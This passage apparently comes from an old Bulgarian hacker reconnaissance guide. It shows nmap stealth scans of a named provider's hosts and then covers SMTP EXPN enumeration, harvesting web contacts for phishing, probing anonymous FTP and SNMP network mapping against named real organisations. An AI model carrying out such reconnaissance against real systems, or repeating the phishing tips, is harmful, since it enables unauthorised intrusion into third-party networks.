Interesting ports on unnamed.infotel.bg (212.39.65.198):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host ibm2210.infotel.bg (212.39.65.199) appears to be up ... good.
Initiating SYN half-open stealth scan against ibm2210.infotel.bg (212.39.65.199)
Adding TCP port 9 (state Open).
Adding TCP port 23 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 9 is open and port 31016 is closed and neither are firewalled
For OSScan assuming that port 9 is open and port 34912 is closed and neither are firewalled
WARNING:  RST from port 9 -- is this port really open?
For OSScan assuming that port 9 is open and port 30676 is closed and neither are firewalled
Interesting ports on ibm2210.infotel.bg (212.39.65.199):
Port    State       Protocol  Service
9       open        tcp        discard
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=8 (Trivial joke)

Sequence numbers: 6F2501 6F2545 6F258A 6F25C8 6F2601 6F2651
No OS matches for this host.  TCP fingerprints:
TSeq(Class=TD%gcd=1%SI=1B)
TSeq(Class=TD%gcd=1%SI=43)
TSeq(Class=TD%gcd=1%SI=8)
T1(Resp=Y%DF=N%W=200%ACK=S++%Flags=AS%Ops=ML)
T2(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host br.infotel.bg (212.39.65.200) appears to be up ... good.
Initiating SYN half-open stealth scan against br.infotel.bg (212.39.65.200)
The SYN scan took 13 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on br.infotel.bg (212.39.65.200):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T6(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.201) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.207) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.208) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.208) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host db.infotel.bg (212.39.65.209) appears to be up ... good.
Initiating SYN half-open stealth scan against db.infotel.bg (212.39.65.209)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
Adding TCP port 43 (state Firewalled).
Adding TCP port 23 (state Firewalled).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 30826 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 30920 is closed and neither are firewalled
Interesting ports on db.infotel.bg (212.39.65.209):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      filtered    tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
43      filtered    tcp        whois
49      filtered    tcp        unknown
70      filtered    tcp        gopher
80      filtered    tcp        www
111     filtered    tcp        sunrpc
113     open        tcp        auth

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 542DCE01 542EC801 542FC201 5430BC01 5431B601 5432B001
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)


Host fpn.infotel.bg (212.39.65.210) appears to be up ... good.
Initiating SYN half-open stealth scan against fpn.infotel.bg (212.39.65.210)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 43 (state Firewalled).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 38565 is closed and neither are firewalled
Interesting ports on fpn.infotel.bg (212.39.65.210):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      filtered    tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
43      filtered    tcp        whois
49      filtered    tcp        unknown
53      open        tcp        domain
70      filtered    tcp        gopher
79      open        tcp        finger
80      filtered    tcp        www
110     open        tcp        pop3
111     filtered    tcp        sunrpc
113     open        tcp        auth
119     open        tcp        nntp

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 55BF2C00 55C21A00 55C60200 55C6FC00 55CAE400 55CBDE00
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)


Host www1.infotel.bg (212.39.65.211) appears to be up ... good.
Initiating SYN half-open stealth scan against www1.infotel.bg (212.39.65.211)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 37 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 43 (state Firewalled).
The SYN scan took 15 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 43012 is closed and neither are firewalled
Interesting ports on www1.infotel.bg (212.39.65.211):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      filtered    tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
43      filtered    tcp        whois
49      filtered    tcp        unknown
53      open        tcp        domain
70      filtered    tcp        gopher
79      open        tcp        finger
80      filtered    tcp        www
110     open        tcp        pop3
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 15658A00 15668400 15687800 15697200 156A6C00 156B6600
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)


Host fw.infotel.bg (212.39.65.212) appears to be up ... good.
Initiating SYN half-open stealth scan against fw.infotel.bg (212.39.65.212)
Adding TCP port 109 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 23 (state Firewalled).
Adding TCP port 119 (state Open).
Adding TCP port 70 (state Firewalled).
Adding TCP port 43 (state Firewalled).
Adding TCP port 110 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 25 is open and port 34434 is closed and neither are firewalled
For OSScan assuming that port 25 is open and port 33472 is closed and neither are firewalled
Interesting ports on fw.infotel.bg (212.39.65.212):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      filtered    tcp        telnet
25      open        tcp        smtp
43      filtered    tcp        whois
49      filtered    tcp        unknown
53      open        tcp        domain
70      filtered    tcp        gopher
80      filtered    tcp        www
109     open        tcp        pop2
110     open        tcp        pop3
111     filtered    tcp        sunrpc
119     open        tcp        nntp

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=22031 (Worthy challenge)

Sequence numbers: 33F3C725 33F45449 33F4D856 33F596D9 33F7041A 33F8023D
Remote operating system guess: HP-UX 10.20
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=560F)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.213) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.214) appears to be down, skipping it.
Host nb.infotel.bg (212.39.65.215) appears to be down, skipping it.
Host switch.infotel.bg (212.39.65.216) appears to be up ... good.
Initiating SYN half-open stealth scan against switch.infotel.bg (212.39.65.216)
Adding TCP port 70 (state Firewalled).
Adding TCP port 23 (state Firewalled).
Adding TCP port 43 (state Firewalled).
The SYN scan took 30 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on switch.infotel.bg (212.39.65.216):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      filtered    tcp        telnet
43      filtered    tcp        whois
49      filtered    tcp        unknown
70      filtered    tcp        gopher
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: 3Com SuperStack II (unknown OS version), Asanta IntraStack Ethernet Switch (6014 DSB Versions: BP(2.06 ), FW(1.03 )), Asanta IntraSwitch 5324, AsanteHub 2072 Ethernet Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=APR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=APR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=APR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.217) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.218) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.219) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.220) appears to be down, skipping it.
Host br.infotel.bg (212.39.65.221) appears to be up ... good.
Initiating SYN half-open stealth scan against br.infotel.bg (212.39.65.221)
The SYN scan took 18 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on br.infotel.bg (212.39.65.221):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.222) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.223) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.223) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.224) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.255) appears to be down, skipping it.
Nmap run completed -- 512 IP addresses (75 hosts up) scanned in 15926 seconds


 <[ So... for the statistics - 13 Ciscos, 10 Windows machines... Does this
 look like a small provider that is not going to crush the others? ]>


     1.4. sendmail, qmail - mail agents, versions

 Here  the EXPN command can be put to very good use; it returns all the
 aliases of a given address ... example:

Trying 194.12.224.34...
Connected to home.nat.bg.
Escape character is '^]'.
220 home.ntrl.net ESMTP Sendmail My/Config; Sun, 18 Jul 1999 18:59:21 +0300
HELO my.machine.com
250 home.ntrl.net Hello root@doom.damned.net [14.122.25.14], pleased to meet you
EXPN root
250 <postmaster@ntrl.net>
EXPN delian
250 <delian@ntrl.net>
EXPN postmaster
250 <postmaster@ntrl.net>
QUIT
221 home.ntrl.net closing connection

 Here,  for example, all of root's mail is forwarded to postmaster. In this
 way  you  can  see  which user account belongs to root, because admins often
 redirect root's mail to their own mailboxes.

     1.5. web - the various services that are offered,
          which sites are hosted there, e-mail addresses of technical
          and administrative contacts (easy to phish), mrtg, various
          databases reachable from the web (for example lotus notes,
          systems for the users, etc.)

 <[ As an example here I can give the systems of BIA and Naturella - from
 there an awful lot of information can be obtained about a user whose account
 is known... Anyone, even under windows, can try this :) ]>

     1.6. FTP - anonymous ftp server, open incoming directory,
          preferred files on the ftp server.

 As  an  example I have taken the ftp server of Sofia University
 (ftp.uni-sofia.bg). With it, several things catch the eye right from the
 start, for example that ftp.bguug.bg or a mirror of it sits there, but on a
 different HDD (when you enter that directory you see a lost+found directory,
 which is created in the root dir of every ext2fs partition). It looks like
 there is some kind of connection between bguug and uni-sofia...

 Another  equally interesting thing is that there are 2 directories that are
 public writeable - incoming and hdd (???), but neither of the 2 directories
 is readable for ftp users.

 In  the  pub directory you find things like software for MacOS, OS/2, win31,
 win95, winNT, dos... In general, the pub directory of any institution gives
 an idea of what software is used in it, because very rarely does anyone keep
 something on their ftp that is not in use. This way you can find out that
 someone uses, for example, wingate (if it is on the ftp), and there are a
 thousand ways to mess with wingate...


     1.7. SNMP - interfaces, netstats, a convenient portscan. Building
          a map of the network based on snmp.


 Sample extract from SNMP:

system.sysDescr.0 = OCTET STRING: "Linux xxx 2.2.10 i586"
system.sysObjectID.0 = OBJECT IDENTIFIER: enterprises.tubs.ibr.linuxMIB
system.sysUpTime.0 = Timeticks: (42416875) 4 days, 21:49:28
system.sysContact.0 = OCTET STRING: "Not Configured"
system.sysName.0 = OCTET STRING: "xxx" Hex: 65 6F 73
system.sysLocation.0 = OCTET STRING: "Not Configured"
system.sysServices.0 = INTEGER: 72
system.sysORLastChange.0 = Timeticks: (0) 0:00:00
system.sysORTable.sysOREntry.sysORID.1 = OBJECT IDENTIFIER: enterprises.tubs.ibr.linuxMIB.1.1
system.sysORTable.sysOREntry.sysORDescr.1 = OCTET STRING: "LINUX agent"
system.sysORTable.sysOREntry.sysORUpTime.1 = Timeticks: (42416876) 4 days, 21:49:28

 <[ identification of the system... uptime, name, location ]>

interfaces.ifNumber.0 = INTEGER: 9

 <[ number of interfaces on the machine... ]>

interfaces.ifTable.ifEntry.ifIndex.1 = INTEGER: 1
interfaces.ifTable.ifEntry.ifIndex.2 = INTEGER: 2
interfaces.ifTable.ifEntry.ifIndex.3 = INTEGER: 3
interfaces.ifTable.ifEntry.ifIndex.4 = INTEGER: 4
interfaces.ifTable.ifEntry.ifIndex.5 = INTEGER: 5
interfaces.ifTable.ifEntry.ifIndex.6 = INTEGER: 6
interfaces.ifTable.ifEntry.ifIndex.7 = INTEGER: 7
interfaces.ifTable.ifEntry.ifIndex.8 = INTEGER: 8
interfaces.ifTable.ifEntry.ifIndex.9 = INTEGER: 9
interfaces.ifTable.ifEntry.ifDescr.1 = OCTET STRING: "lo" Hex: 6C 6F
interfaces.ifTable.ifEntry.ifDescr.2 = OCTET STRING: "eth0" Hex: 65 74 68 30
interfaces.ifTable.ifEntry.ifDescr.3 = OCTET STRING: "dummy0"
interfaces.ifTable.ifEntry.ifDescr.4 = OCTET STRING: "ppp0" Hex: 70 70 70 30
interfaces.ifTable.ifEntry.ifDescr.5 = OCTET STRING: "ppp5" Hex: 70 70 70 35
interfaces.ifTable.ifEntry.ifDescr.6 = OCTET STRING: "ppp1" Hex: 70 70 70 31
interfaces.ifTable.ifEntry.ifDescr.7 = OCTET STRING: "ppp3" Hex: 70 70 70 33
interfaces.ifTable.ifEntry.ifDescr.8 = OCTET STRING: "ppp4" Hex: 70 70 70 34
interfaces.ifTable.ifEntry.ifDescr.9 = OCTET STRING: "ppp2" Hex: 70 70 70 32

 <[ up to here this is the part of the interface table describing their names ]>

interfaces.ifTable.ifEntry.ifType.1 = INTEGER: softwareLoopback(24)
interfaces.ifTable.ifEntry.ifType.2 = INTEGER: ethernet-csmacd(6)
interfaces.ifTable.ifEntry.ifType.3 = INTEGER: other(1)
interfaces.ifTable.ifEntry.ifType.4 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.5 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.6 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.7 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.8 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.9 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifMtu.1 = INTEGER: 3924
interfaces.ifTable.ifEntry.ifMtu.2 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.3 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.4 = INTEGER: 576
interfaces.ifTable.ifEntry.ifMtu.5 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.6 = INTEGER: 576
interfaces.ifTable.ifEntry.ifMtu.7 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.8 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.9 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifSpeed.1 = Gauge: 10000000
interfaces.ifTable.ifEntry.ifSpeed.2 = Gauge: 10000000
interfaces.ifTable.ifEntry.ifSpeed.3 = Gauge: 0
interfaces.ifTable.ifEntry.ifSpeed.4 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.5 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.6 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.7 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.8 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.9 = Gauge: 28800

 <[ various parameters ..... ]>

interfaces.ifTable.ifEntry.ifPhysAddress.1 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.2 = OCTET STRING:  Hex: 52 54 AB DD 28 47
interfaces.ifTable.ifEntry.ifPhysAddress.3 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.4 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.5 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.6 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.7 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.8 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.9 = OCTET STRING:  Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifAdminStatus.1 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.2 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.3 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.4 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.5 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.6 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.7 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.8 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.9 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.1 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.2 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.3 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.4 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.5 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.6 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.7 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.8 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.9 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifLastChange.1 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.2 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.3 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.4 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.5 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.6 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.7 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.8 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.9 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifInOctets.1 = Counter: 176674335
interfaces.ifTable.ifEntry.ifInOctets.2 = Counter: 139040096
interfaces.ifTable.ifEntry.ifInOctets.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInOctets.4 = Counter: 167871867
interfaces.ifTable.ifEntry.ifInOctets.5 = Counter: 3721
interfaces.ifTable.ifEntry.ifInOctets.6 = Counter: 57281
interfaces.ifTable.ifEntry.ifInOctets.7 = Counter: 218308
interfaces.ifTable.ifEntry.ifInOctets.8 = Counter: 31701
interfaces.ifTable.ifEntry.ifInOctets.9 = Counter: 3920
interfaces.ifTable.ifEntry.ifInUcastPkts.1 = Counter: 2160934
interfaces.ifTable.ifEntry.ifInUcastPkts.2 = Counter: 836960
interfaces.ifTable.ifEntry.ifInUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInUcastPkts.4 = Counter: 613948
interfaces.ifTable.ifEntry.ifInUcastPkts.5 = Counter: 107
interfaces.ifTable.ifEntry.ifInUcastPkts.6 = Counter: 2313
interfaces.ifTable.ifEntry.ifInUcastPkts.7 = Counter: 3234
interfaces.ifTable.ifEntry.ifInUcastPkts.8 = Counter: 464
interfaces.ifTable.ifEntry.ifInUcastPkts.9 = Counter: 46
interfaces.ifTable.ifEntry.ifInNUcastPkts.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.4 = Counter: 20
interfaces.ifTable.ifEntry.ifInErrors.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.6 = Counter: 2
interfaces.ifTable.ifEntry.ifInErrors.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutOctets.1 = Counter: 176674335
interfaces.ifTable.ifEntry.ifOutOctets.2 = Counter: 237343906
interfaces.ifTable.ifEntry.ifOutOctets.3 = Counter: 1641685
interfaces.ifTable.ifEntry.ifOutOctets.4 = Counter: 35680061
interfaces.ifTable.ifEntry.ifOutOctets.5 = Counter: 3173
interfaces.ifTable.ifEntry.ifOutOctets.6 = Counter: 208146
interfaces.ifTable.ifEntry.ifOutOctets.7 = Counter: 1196797
interfaces.ifTable.ifEntry.ifOutOctets.8 = Counter: 120353
interfaces.ifTable.ifEntry.ifOutOctets.9 = Counter: 4279
interfaces.ifTable.ifEntry.ifOutUcastPkts.1 = Counter: 2160934
interfaces.ifTable.ifEntry.ifOutUcastPkts.2 = Counter: 827267
interfaces.ifTable.ifEntry.ifOutUcastPkts.3 = Counter: 3865
interfaces.ifTable.ifEntry.ifOutUcastPkts.4 = Counter: 556396
interfaces.ifTable.ifEntry.ifOutUcastPkts.5 = Counter: 103
interfaces.ifTable.ifEntry.ifOutUcastPkts.6 = Counter: 2286
interfaces.ifTable.ifEntry.ifOutUcastPkts.7 = Counter: 3688
interfaces.ifTable.ifEntry.ifOutUcastPkts.8 = Counter: 433
interfaces.ifTable.ifEntry.ifOutUcastPkts.9 = Counter: 50
interfaces.ifTable.ifEntry.ifOutNUcastPkts.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.2 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.8 = Counter: 0
